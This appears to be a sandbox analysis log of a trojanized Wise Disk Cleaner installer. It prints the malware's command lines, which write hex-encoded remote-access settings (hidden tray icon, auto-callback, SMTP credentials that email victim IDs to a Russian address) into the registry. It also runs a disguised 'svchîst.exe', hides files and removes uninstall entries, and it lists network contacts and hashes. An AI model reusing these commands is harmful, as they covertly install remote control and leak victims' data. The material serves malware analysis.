"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe

"C:\Users\Admin\AppData\Local\Temp\is-KQKMN.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

"C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.wisecleaner.net udp
US 23.224.25.141:80 www.wisecleaner.net tcp
US 8.8.8.8:53 info.wisecleaner.com udp
US 8.8.8.8:53 www.wisecleaner.net udp
US 104.26.2.143:80 info.wisecleaner.com tcp
US 23.224.25.141:80 www.wisecleaner.net tcp
US 104.26.2.143:80 info.wisecleaner.com tcp
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.129:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 77.223.124.212:5655 tcp

Files

memory/1096-54-0x0000000075B71000-0x0000000075B73000-memory.dmp

memory/1540-57-0x0000000000000000-mapping.dmp

memory/1660-58-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

